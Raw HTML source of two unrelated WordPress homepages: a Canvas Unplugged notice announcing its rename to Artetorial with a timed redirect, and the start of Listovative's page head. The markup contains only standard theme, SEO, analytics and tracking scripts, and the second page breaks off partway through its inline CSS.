type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/canvasunplugged.com\/","name":"Canvas Unplugged - Home","alternateName":"Canvas Unplugged - News Interpreted, Transformed, Designed","potentialAction":{"@type":"SearchAction","target":"https:\/\/canvasunplugged.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"Organization","url":"https:\/\/canvasunplugged.com\/","sameAs":["https:\/\/www.facebook.com\/Canvas-Unplugged-1555455404762329\/","https:\/\/www.instagram.com\/canvasunplugged\/","https:\/\/www.youtube.com\/channel\/UCX8vfncPjdMSg662fNBgWBw","https:\/\/www.pinterest.com\/canvasunplugged\/","https:\/\/twitter.com\/canvasunplugged"],"@id":"#organization","name":"Canvas Unplugged","logo":""}</script> <!-- / Yoast SEO Premium plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Canvas Unplugged - Home &raquo; Feed" href="https://canvasunplugged.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Canvas Unplugged - Home &raquo; Comments Feed" href="https://canvasunplugged.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/canvasunplugged.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <meta content="Divi Child v.2.7.8.1479163638" name="generator"/><style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='login-with-ajax-css' href='https://canvasunplugged.com/wp-content/plugins/login-with-ajax/widget/widget.css' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_stylesheet-css' href='https://canvasunplugged.com/wp-content/plugins/captcha/css/front_end_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://canvasunplugged.com/wp-includes/css/dashicons.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_desktop_style-css' href='https://canvasunplugged.com/wp-content/plugins/captcha/css/desktop_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='chld_thm_cfg_parent-css' href='https://canvasunplugged.com/wp-content/themes/Divi/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='divi-fonts-css' href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='divi-style-css' href='https://canvasunplugged.com/wp-content/themes/Divi-child/style.css' type='text/css' media='all' /> <script type='text/javascript' src='https://canvasunplugged.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://canvasunplugged.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var LWA = {"ajaxurl":"https:\/\/canvasunplugged.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://canvasunplugged.com/wp-content/plugins/login-with-ajax/widget/login-with-ajax.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var mb_ajax = {"ajaxurl":"https:\/\/canvasunplugged.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://canvasunplugged.com/wp-content/plugins/maxbuttons/js/min/front.js'></script> <link rel='https://api.w.org/' href='https://canvasunplugged.com/wp-json/' /> <meta name="generator" content="WordPress 4.9.8" /> <link rel='shortlink' href='https://canvasunplugged.com/' /> <link rel="alternate" type="application/json+oembed" href="https://canvasunplugged.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcanvasunplugged.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://canvasunplugged.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcanvasunplugged.com%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//canvasunplugged.com/?wordfence_lh=1&hid=D212DDE97A576B16215E49D307AD2E1A'); </script><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><style type="text/css" id="custom-background-css"> body.custom-background { background-color: #004a61; } </style> <meta name="p:domain_verify" content="89a2d2565ee1a1ee2dc149bf9ef3ce53"/> <meta name="google-site-verification" content="1D5DcpGiW_RMtKRPB-kcWybjs8szV0IkmKVMAKO-H84" /> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-8886277629121261", enable_page_level_ads: true }); </script> <!-- BEGIN Typekit Fonts for WordPress --> <!-- END Typekit Fonts for WordPress --> <link rel="stylesheet" id="et-core-unified-cached-inline-styles" href="https://canvasunplugged.com/wp-content/cache/et/1/1/336/et-core-unified-15573298838.min.css" onerror="et_core_page_resource_fallback(this, true)" onload="et_core_page_resource_fallback(this)" /></head> <body class="home page-template page-template-page-template-blank page-template-page-template-blank-php page page-id-336 custom-background et_pb_button_helper_class et_fixed_nav et_show_nav et_cover_background et_pb_gutter et_pb_gutters2 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns1 et_header_style_left et_pb_pagebuilder_layout et_right_sidebar et_divi_theme et-db et_minified_js et_minified_css"> <div id="page-container"> <div id="main-content"> <article id="post-336" class="post-336 page type-page status-publish hentry"> <div class="entry-content"> <div id="et-boc" class="et-boc"> <div class="et_builder_inner_content et_pb_gutters3"> <div id="new-home-page-v2-top-black-bar-section" class="et_pb_section et_pb_section_0 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_0 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_image et_pb_image_0 et_always_center_on_mobile"> <span class="et_pb_image_wrap"><img src="https://canvasunplugged.com/wp-content/uploads/2017/06/CU-Logo-plus-Tagline-White-on-Black-Background.png" alt="Canvas Unplugged - An Art Gallery of Today&#039;s Headlines" /></span> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_1 et_pb_section_video et_pb_preload et_pb_with_background et_section_regular"> <span class="et_pb_section_video_bg"> <video loop="loop" autoplay playsinline muted height="100"> <source type="video/mp4" src="https://canvasunplugged.com/wp-content/uploads/2017/02/CU_Loop.mp4" /> <source type="video/webm" src="https://canvasunplugged.com/wp-content/uploads/2017/02/CU_Loop.webm" /> </video> </span> <div class="et_pb_row et_pb_row_1 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_1_5 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_3_5 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_divider_0 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <p style="text-align: center; margin-bottom: 0px;"><span style="font-size: 14pt;">Thank you for visiting. </span></p> <p style="text-align: center; margin-bottom: 0px;"><span style="font-size: 14pt;">CANVAS Unplugged has changed its name to Artetorial! </span></p> <p style="text-align: center; margin-bottom: 0px;"><span style="font-size: 14pt;">Please explore our launch gallery at our new home&#8230;</span></p> <p style="text-align: center; margin-bottom: 0px;"><span style="font-size: 14pt;"> <a href="https://www.artetorial.com">Artetorial.com</a></span></p> <p>(You will be redirected in 5 seconds)<br /> <meta http-equiv="refresh" content="5; url=https://artetorial.com"> Please wait while you are redirected...or <a href="https://artetorial.com">Click Here</a> if you do not want to wait. </p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_5 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough et-last-child et_pb_column_empty"> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_2"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --> </div> </div> </div> <!-- .entry-content --> </article> <!-- .et_pb_post --> </div> <!-- #main-content --> </div> <!-- #page-container --> <script type="text/javascript"> var et_animation_data = []; </script> <!-- Google Analytics CanvasUnplugged.com ------> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-91362215-1', 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics CanvasUnplugged.com ------> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '738048266367063', { em: 'insert_email_variable' }); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=738048266367063&ev=PageView&noscript=1" /></noscript> <!-- DO NOT MODIFY --> <!-- End Facebook Pixel Code --> <!-- Wishpond Tracking Code Code --> <script type="text/javascript"> (function(d, s, id) { window.Wishpond = window.Wishpond || {}; Wishpond.merchantId = '1350009'; Wishpond.writeKey = '85a7df0269f9'; var js, wpjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//cdn.wishpond.net/connect.js"; wpjs.parentNode.insertBefore(js, wpjs); }(document, 'script', 'wishpond-connect')); </script> <!-- End - Wishpond Tracking Code Code --><link rel='stylesheet' id='mediaelement-css' href='https://canvasunplugged.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://canvasunplugged.com/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /> <script type='text/javascript' src='https://canvasunplugged.com/wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/js/blankshield/blankshield.min.js'></script> <script type='text/javascript' src='https://canvasunplugged.com/wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/js/block-tabnapping.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var DIVI = {"item_count":"%d Item","items_count":"%d Items"}; var et_shortcodes_strings = {"previous":"Previous","next":"Next"}; var et_pb_custom = {"ajaxurl":"https:\/\/canvasunplugged.com\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/canvasunplugged.com\/wp-content\/themes\/Divi\/images","builder_images_uri":"https:\/\/canvasunplugged.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"682427842c","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"4c0a8f4ab9","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","is_builder_plugin_used":"","ignore_waypoints":"no","is_divi_theme_used":"1","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"336","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"no","is_shortcode_tracking":""}; var et_pb_box_shadow_elements = []; /* ]]> */ </script> <script type='text/javascript' src='https://canvasunplugged.com/wp-content/themes/Divi/js/custom.min.js'></script> <script type='text/javascript' src='https://canvasunplugged.com/wp-content/themes/Divi/core/admin/js/common.js'></script> <script type='text/javascript' src='https://canvasunplugged.com/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://canvasunplugged.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js'></script> <script type='text/javascript' src='https://canvasunplugged.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <script type='text/javascript' src='https://canvasunplugged.com/wp-includes/js/mediaelement/wp-mediaelement.min.js'></script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Object Caching 6/116 objects using disk Page Caching using disk: enhanced Served from: canvasunplugged.com @ 2019-05-16 08:52:10 by W3 Total Cache -->
0
<!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en"> <![endif]--> <!--[if IE 9]> <html class="no-js ie9" lang="en"> <![endif]--> <!--[if gt IE 9]> <html class="no-js gt-ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head><link rel="stylesheet" type="text/css" href="https://listovative.com/wp-content/cache/minify/6756d.css" media="all" /> <!-- Meta Tags --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="user-scalable=yes, width=device-width, initial-scale=1, maximum-scale=1"> <!-- Title --> <!-- This site is optimized with the Yoast SEO plugin v4.0 - https://yoast.com/wordpress/plugins/seo/ --> <title>Listovative - Step into the World of Informative Lists</title> <link rel="canonical" href="https://listovative.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Listovative - Step into the World of Informative Lists" /> <meta property="og:url" content="https://listovative.com/" /> <meta property="og:site_name" content="Listovative" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/listovative.com\/","name":"Listovative","potentialAction":{"@type":"SearchAction","target":"https:\/\/listovative.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//cdn.rawgit.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Listovative &raquo; Feed" href="https://listovative.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Listovative &raquo; Comments Feed" href="https://listovative.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Listovative &raquo; Home Comments Feed" href="https://listovative.com/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/listovative.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=67cee33760e4868f112ea0d581be5fdb"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wpsr_sb_fa_css-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=67cee33760e4868f112ea0d581be5fdb' type='text/css' media='all' /> <link rel='stylesheet' id='wpsr_sb_css-css' href='https://cdn.rawgit.com/vaakash/socializer/01252dd4/css/socializer.min.css?ver=67cee33760e4868f112ea0d581be5fdb' type='text/css' media='all' /> <link rel='stylesheet' id='thr_font_0-css' href='https://fonts.googleapis.com/css?family=Roboto%3A400%2C300&#038;subset=latin%2Clatin-ext&#038;ver=1.2.0' type='text/css' media='screen' /> <link rel='stylesheet' id='thr_font_1-css' href='https://fonts.googleapis.com/css?family=PT+Sans+Narrow&#038;subset=latin%2Clatin-ext&#038;ver=1.2.0' type='text/css' media='screen' /> <link rel='stylesheet' id='thr_font_2-css' href='https://fonts.googleapis.com/css?family=Roboto+Condensed&#038;subset=latin%2Clatin-ext&#038;ver=1.2.0' type='text/css' media='screen' /> <style id='thr_style-inline-css' type='text/css'> body,.button_respond,.thr_author_link {font-family: 'Roboto';font-weight: 300;}h1,h2,h3,h4,h5,h6,.featured_posts_link,.mks_author_widget h3{font-family: 'PT Sans Narrow';font-weight: 400;}#nav li a,.site-title,.site-title a,.site-desc,.sidr ul li a{font-family: 'Roboto Condensed';font-weight: 400;}body,.overlay_bg_div{background-color: rgba(243,243,243,1.00);}.arch_line,.page-progress span{background: #e23a3e;}.thr_boxed_wrapper,.is_bxd.meta-share{background-color: #ffffff;}.thr_boxed{margin-top: 0px;}::-webkit-input-placeholder { color:#0a0a0a;}:-moz-placeholder { color: #0a0a0a;}::-moz-placeholder { color:#0a0a0a;}:-ms-input-placeholder { color:#0a0a0a;}.site-title a,#nav li a,.header-main,.search_header_form input[type="text"], .search_header_form input[type="text"]:focus,.menu-item-has-children:after,.sidr ul li span,.sidr ul li a {color: #0a0a0a;}#nav > ul > li:hover > a, #nav a:hover,#nav li.current-menu-item > a,#nav li.current_page_item > a,#nav li.current-menu-item.menu-item-has-children:after,#nav li.current_page_item.menu-item-has-children:after,.sidr ul li:hover > a, .sidr ul li:hover > span,#sidr-existing-content li.sidr-class-current_page_item > a,#sidr-existing-content li.sidr-class-current_page_item > .thr_menu_parent,#sidr-existing-content li.sidr-class-current-menu-item > a,#sidr-existing-content li.sidr-class-current-menu-item > .thr_menu_parent{color: #e23a3e;}.sidr ul li:hover > a, .sidr ul li.active > a, .sidr ul li.sidr-class-active > a,.sidr ul li ul li:hover > a, .sidr ul li ul li.active > a, .sidr ul li ul li.sidr-class-active > a {-webkit-box-shadow: inset 2px 0 0 0px #e23a3e;-moz-box-shadow: inset 2px 0 0 0px #e23a3e;box-shadow: inset 2px 0 0 0px #e23a3e;}.menu-item-has-children:after{border-top-color: #0a0a0a;}li.menu-item-has-children:hover:after{color: #e23a3e;}.header-main {height: 82px;background-color: rgba(255,255,255,1.00);background-repeat:repeat;}.sidr{background-color: rgba(255,255,255,1.00);}#sticky_header{background:rgba(255,255,255,0.9);}.header-main .search_header_form{background-color: transparent;}.header-main .search_header_form input[type="text"]{top:17px;;}#nav li a{padding: 30px 3px 31px;}.header-bottom,#nav .sub-menu{background-color: #ffffff;}.header_ads_space{margin: -4px 0;}.logo_wrapper{top: 1px;left: 0px;}.menu-item-has-children:after{margin: 35px 0 0 2px;}.main_content_wrapper{background-color: #ffffff;}.thr_content_wrapped .meta-share{background-color: #ffffff;}.main_content_wrapper .single .entry-title, .page-template-default .entry-title,.main_content_wrapper .entry-title a,.main_content_wrapper h1,.main_content_wrapper h2,.main_content_wrapper h3,.main_content_wrapper h4, .main_content_wrapper h5,.main_content_wrapper h6,#subheader_box h1,#subheader_box h2,#subheader_box h3,#subheader_box h4,#subheader_box h5,#subheader_box h6{color: #333333;}.main_content_wrapper,#subheader_box p{color: #444444;}.meta-item,.meta-item a,.comment-metadata time,.comment-list .reply a,.main_content_wrapper .button_respond,li.cat-item,.widget_archive li,.widget_recent_entries ul span{color: #444444;}.meta-item i,.entry-title a:hover,a,.comment-metadata time:before,.button_respond:hover,.button_respond i,.comment-list .reply a:before,.comment-list .reply a:hover,.meta-item a:hover,.error404 h1,.thr_content_wrapped .meta-share.meta-itemi{color: #e23a3e;}.error404 .entry-content .nav-menu li a{background: #e23a3e;}.underlined_heading span{border-bottom-color: #e23a3e;}blockquote{border-color: #e23a3e;}.comment-reply-title:after,#submit,.meta-item .read_more_button, .thr_button, input[type="submit"],.current, .page-numbers:hover, #pagination .post_previous a:hover, #pagination .post_next a:hover, .load_more_posts a:hover,.f_read_more,.wp-caption .wp-caption-text,.entry-content .mejs-container .mejs-controls, .entry-content .mejs-embed, .entry-content .mejs-embed body,.comment-list li.bypostauthor > .comment-body:after,.comment-list li.comment-author-admin > .comment-body:after{background: #e23a3e;}.entry-content .mejs-controls .mejs-time-rail .mejs-time-total,.entry-content .mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-total,.entry-content .mejs-controls .mejs-time-rail .mejs-time-loaded{background: rgba(243,243,243,1.00);}.entry-content .mejs-controls .mejs-time-rail .mejs-time-current,.entry-content .mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-current {background: rgba(226,58,62,0.5);}.current, .page-numbers:hover, #pagination .post_previous a:hover, #pagination .post_next a:hover, .load_more_posts a:hover{box-shadow: inset 0 0 0 1px #e23a3e;}.thr_sidebar_wrapped #sidebar,.thr_widget_wrapped #sidebar .widget,.thr_sidebar_wrapped .affix,.thr_sidebar_wrapped .affix-bottom{background: #ffffff;}#sidebar .widget-title,#sidebar h1,#sidebar h2,#sidebar h3,#sidebar h4,#sidebar h5,#sidebar h6{color: #333333;}#sidebar .widget-title span{border-bottom-color: #e23a3e;}.widget_tag_cloud a,#sidebar .widget a,li.recentcomments:before {color: 